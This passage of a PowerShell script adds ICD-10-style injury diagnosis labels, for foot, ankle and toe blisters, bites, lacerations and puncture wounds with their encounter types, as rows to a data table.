= $DiagnosisList.Rows.Add("Blister (nonthermal), right foot","Blister (nonthermal), right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), right foot","Blister (nonthermal), right foot, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left foot","Blister (nonthermal), left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left foot","Blister (nonthermal), left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), left foot","Blister (nonthermal), left foot, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified foot","Blister (nonthermal), unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified foot","Blister (nonthermal), unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal), unspecified foot","Blister (nonthermal), unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, right foot","External constriction, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right foot","External constriction, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, right foot","External constriction, right foot, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, left foot","External constriction, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left foot","External constriction, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, left foot","External constriction, left foot, sequela") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified foot","External constriction, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified foot","External constriction, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction, unspecified foot","External constriction, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right foot","Superficial foreign body, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right foot","Superficial foreign body, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, right foot","Superficial foreign body, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left foot","Superficial foreign body, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left foot","Superficial foreign body, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, left foot","Superficial foreign body, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified foot","Superficial foreign body, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified foot","Superficial foreign body, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body, unspecified foot","Superficial foreign body, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right foot","Insect bite (nonvenomous), right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right foot","Insect bite (nonvenomous), right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), right foot","Insect bite (nonvenomous), right foot, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left foot","Insect bite (nonvenomous), left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left foot","Insect bite (nonvenomous), left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), left foot","Insect bite (nonvenomous), left foot, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified foot","Insect bite (nonvenomous), unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified foot","Insect bite (nonvenomous), unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous), unspecified foot","Insect bite (nonvenomous), unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right foot","Other superficial bite of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right foot","Other superficial bite of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right foot","Other superficial bite of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left foot","Other superficial bite of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left foot","Other superficial bite of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left foot","Other superficial bite of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified foot","Other superficial bite of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified foot","Other superficial bite of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified foot","Other superficial bite of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right ankle","Unspecified superficial injury of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right ankle","Unspecified superficial injury of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right ankle","Unspecified superficial injury of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left ankle","Unspecified superficial injury of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left ankle","Unspecified superficial injury of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left ankle","Unspecified superficial injury of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified ankle","Unspecified superficial injury of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified ankle","Unspecified superficial injury of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified ankle","Unspecified superficial injury of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right foot","Unspecified superficial injury of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right foot","Unspecified superficial injury of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right foot","Unspecified superficial injury of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left foot","Unspecified superficial injury of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left foot","Unspecified superficial injury of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left foot","Unspecified superficial injury of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified foot","Unspecified superficial injury of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified foot","Unspecified superficial injury of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified foot","Unspecified superficial injury of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right great toe","Unspecified superficial injury of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right great toe","Unspecified superficial injury of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right great toe","Unspecified superficial injury of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left great toe","Unspecified superficial injury of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left great toe","Unspecified superficial injury of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left great toe","Unspecified superficial injury of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified great toe","Unspecified superficial injury of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified great toe","Unspecified superficial injury of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified great toe","Unspecified superficial injury of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right lesser toe(s)","Unspecified superficial injury of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right lesser toe(s)","Unspecified superficial injury of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right lesser toe(s)","Unspecified superficial injury of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left lesser toe(s)","Unspecified superficial injury of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left lesser toe(s)","Unspecified superficial injury of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left lesser toe(s)","Unspecified superficial injury of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified lesser toe(s)","Unspecified superficial injury of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified lesser toe(s)","Unspecified superficial injury of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified lesser toe(s)","Unspecified superficial injury of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right ankle","Unspecified open wound, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right ankle","Unspecified open wound, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right ankle","Unspecified open wound, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left ankle","Unspecified open wound, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left ankle","Unspecified open wound, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left ankle","Unspecified open wound, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified ankle","Unspecified open wound, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified ankle","Unspecified open wound, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified ankle","Unspecified open wound, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right ankle","Laceration without foreign body, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right ankle","Laceration without foreign body, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right ankle","Laceration without foreign body, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left ankle","Laceration without foreign body, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left ankle","Laceration without foreign body, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left ankle","Laceration without foreign body, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified ankle","Laceration without foreign body, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified ankle","Laceration without foreign body, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified ankle","Laceration without foreign body, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right ankle","Laceration with foreign body, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right ankle","Laceration with foreign body, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right ankle","Laceration with foreign body, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left ankle","Laceration with foreign body, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left ankle","Laceration with foreign body, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left ankle","Laceration with foreign body, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified ankle","Laceration with foreign body, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified ankle","Laceration with foreign body, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified ankle","Laceration with foreign body, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right ankle","Puncture wound without foreign body, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right ankle","Puncture wound without foreign body, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right ankle","Puncture wound without foreign body, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left ankle","Puncture wound without foreign body, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left ankle","Puncture wound without foreign body, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left ankle","Puncture wound without foreign body, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified ankle","Puncture wound without foreign body, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified ankle","Puncture wound without foreign body, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified ankle","Puncture wound without foreign body, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right ankle","Puncture wound with foreign body, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right ankle","Puncture wound with foreign body, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right ankle","Puncture wound with foreign body, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left ankle","Puncture wound with foreign body, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left ankle","Puncture wound with foreign body, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left ankle","Puncture wound with foreign body, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified ankle","Puncture wound with foreign body, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified ankle","Puncture wound with foreign body, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified ankle","Puncture wound with foreign body, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, right ankle","Open bite, right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right ankle","Open bite, right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right ankle","Open bite, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, left ankle","Open bite, left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left ankle","Open bite, left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left ankle","Open bite, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified ankle","Open bite, unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified ankle","Open bite, unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified ankle","Open bite, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right great toe without damage to nail","Unspecified open wound of right great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right great toe without damage to nail","Unspecified open wound of right great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right great toe without damage to nail","Unspecified open wound of right great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left great toe without damage to nail","Unspecified open wound of left great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left great toe without damage to nail","Unspecified open wound of left great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left great toe without damage to nail","Unspecified open wound of left great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified great toe without damage to nail","Unspecified open wound of unspecified great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified great toe without damage to nail","Unspecified open wound of unspecified great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified great toe without damage to nail","Unspecified open wound of unspecified great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right lesser toe(s) without damage to nail","Unspecified open wound of right lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right lesser toe(s) without damage to nail","Unspecified open wound of right lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right lesser toe(s) without damage to nail","Unspecified open wound of right lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left lesser toe(s) without damage to nail","Unspecified open wound of left lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left lesser toe(s) without damage to nail","Unspecified open wound of left lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left lesser toe(s) without damage to nail","Unspecified open wound of left lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified lesser toe(s) without damage to nail","Unspecified open wound of unspecified lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified lesser toe(s) without damage to nail","Unspecified open wound of unspecified lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified lesser toe(s) without damage to nail","Unspecified open wound of unspecified lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified toe(s) without damage to nail","Unspecified open wound of unspecified toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified toe(s) without damage to nail","Unspecified open wound of unspecified toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified toe(s) without damage to nail","Unspecified open wound of unspecified toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right great toe without damage to nail","Laceration without foreign body of right great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right great toe without damage to nail","Laceration without foreign body of right great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right great toe without damage to nail","Laceration without foreign body of right great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left great toe without damage to nail","Laceration without foreign body of left great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left great toe without damage to nail","Laceration without foreign body of left great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left great toe without damage to nail","Laceration without foreign body of left great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified great toe without damage to nail","Laceration without foreign body of unspecified great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified great toe without damage to nail","Laceration without foreign body of unspecified great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified great toe without damage to nail","Laceration without foreign body of unspecified great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right lesser toe(s) without damage to nail","Laceration without foreign body of right lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right lesser toe(s) without damage to nail","Laceration without foreign body of right lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right lesser toe(s) without damage to nail","Laceration without foreign body of right lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left lesser toe(s) without damage to nail","Laceration without foreign body of left lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left lesser toe(s) without damage to nail","Laceration without foreign body of left lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left lesser toe(s) without damage to nail","Laceration without foreign body of left lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified lesser toe(s) without damage to nail","Laceration without foreign body of unspecified lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified lesser toe(s) without damage to nail","Laceration without foreign body of unspecified lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified lesser toe(s) without damage to nail","Laceration without foreign body of unspecified lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified toe without damage to nail","Laceration without foreign body of unspecified toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified toe without damage to nail","Laceration without foreign body of unspecified toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified toe without damage to nail","Laceration without foreign body of unspecified toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right great toe without damage to nail","Laceration with foreign body of right great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right great toe without damage to nail","Laceration with foreign body of right great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right great toe without damage to nail","Laceration with foreign body of right great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left great toe without damage to nail","Laceration with foreign body of left great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left great toe without damage to nail","Laceration with foreign body of left great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left great toe without damage to nail","Laceration with foreign body of left great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified great toe without damage to nail","Laceration with foreign body of unspecified great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified great toe without damage to nail","Laceration with foreign body of unspecified great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified great toe without damage to nail","Laceration with foreign body of unspecified great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right lesser toe(s) without damage to nail","Laceration with foreign body of right lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right lesser toe(s) without damage to nail","Laceration with foreign body of right lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right lesser toe(s) without damage to nail","Laceration with foreign body of right lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left lesser toe(s) without damage to nail","Laceration with foreign body of left lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left lesser toe(s) without damage to nail","Laceration with foreign body of left lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left lesser toe(s) without damage to nail","Laceration with foreign body of left lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified lesser toe(s) without damage to nail","Laceration with foreign body of unspecified lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified lesser toe(s) without damage to nail","Laceration with foreign body of unspecified lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified lesser toe(s) without damage to nail","Laceration with foreign body of unspecified lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified toe(s) without damage to nail","Laceration with foreign body of unspecified toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified toe(s) without damage to nail","Laceration with foreign body of unspecified toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified toe(s) without damage to nail","Laceration with foreign body of unspecified toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right great toe without damage to nail","Puncture wound without foreign body of right great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right great toe without damage to nail","Puncture wound without foreign body of right great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right great toe without damage to nail","Puncture wound without foreign body of right great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left great toe without damage to nail","Puncture wound without foreign body of left great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left great toe without damage to nail","Puncture wound without foreign body of left great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left great toe without damage to nail","Puncture wound without foreign body of left great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified great toe without damage to nail","Puncture wound without foreign body of unspecified great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified great toe without damage to nail","Puncture wound without foreign body of unspecified great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified great toe without damage to nail","Puncture wound without foreign body of unspecified great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right lesser toe(s) without damage to nail","Puncture wound without foreign body of right lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right lesser toe(s) without damage to nail","Puncture wound without foreign body of right lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right lesser toe(s) without damage to nail","Puncture wound without foreign body of right lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left lesser toe(s) without damage to nail","Puncture wound without foreign body of left lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left lesser toe(s) without damage to nail","Puncture wound without foreign body of left lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left lesser toe(s) without damage to nail","Puncture wound without foreign body of left lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified lesser toe(s) without damage to nail","Puncture wound without foreign body of unspecified lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified lesser toe(s) without damage to nail","Puncture wound without foreign body of unspecified lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified lesser toe(s) without damage to nail","Puncture wound without foreign body of unspecified lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified toe(s) without damage to nail","Puncture wound without foreign body of unspecified toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified toe(s) without damage to nail","Puncture wound without foreign body of unspecified toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified toe(s) without damage to nail","Puncture wound without foreign body of unspecified toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right great toe without damage to nail","Puncture wound with foreign body of right great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right great toe without damage to nail","Puncture wound with foreign body of right great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right great toe without damage to nail","Puncture wound with foreign body of right great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left great toe without damage to nail","Puncture wound with foreign body of left great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left great toe without damage to nail","Puncture wound with foreign body of left great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left great toe without damage to nail","Puncture wound with foreign body of left great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified great toe without damage to nail","Puncture wound with foreign body of unspecified great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified great toe without damage to nail","Puncture wound with foreign body of unspecified great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified great toe without damage to nail","Puncture wound with foreign body of unspecified great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right lesser toe(s) without damage to nail","Puncture wound with foreign body of right lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right lesser toe(s) without damage to nail","Puncture wound with foreign body of right lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right lesser toe(s) without damage to nail","Puncture wound with foreign body of right lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left 